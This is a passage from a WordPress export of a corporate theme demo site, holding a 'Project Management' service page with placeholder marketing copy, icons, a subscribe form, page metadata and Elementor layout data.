;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:8:{s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:2;s:7:"_margin";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"icon_font";i:4;s:5:"title";i:4;s:3:"des";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:9:"icon_size";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:9:"btn_style";i:1;s:4:"text";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:17:"button_text_color";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:4;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:4;s:15:"_padding_tablet";i:3;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:10:"lbar_color";i:4;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Project Management</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/project-management/</link>
		<pubDate>Tue, 22 Sep 2020 02:52:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=996</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h5>How It Works &amp; How We Do It</h5>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h5>Business Planning &amp; Strategy</h5>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home4.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home4-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h6>Services</h6>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

finance planning
</a></li>
</ul>
<h6>Contacts</h6>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home4.jpg" alt="" loading="lazy">								</a>
<img src="https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg" alt="" loading="lazy">
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-corporate/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>996</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:52:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:52:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-management]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"6faa64b","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"0bb9c88","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"6824581","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":905},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"3400a2a","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"c4b8ef3","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a0af2ca","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"4ad2da5","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"c3411e5","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"fddc28e","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"fbccab8","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2afaea5","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"a8024cf","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"d420dea","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"ab89b5a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"8c96bde","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Raleway","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#55BB53","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"dc8f05f","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c88ecd3","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a061656","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"b9814ba","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3838be4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"72c6e5e","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ee945f4","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"05b9e13","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"9ff3f8e","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"2a1f3b6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home4.png","id":2074},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"5c20bfd","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"a5714fa","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #55bb53;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"b7198e9","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"a53f436","elType":"widget","settings":{"title":"Services","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"d016178","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"676aa62","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"aee7a43","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"8dd2aa8","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"67ff888","elType":"widget","settings":{"text":"Divider","color":"#55BB53","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"3da52cb","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational 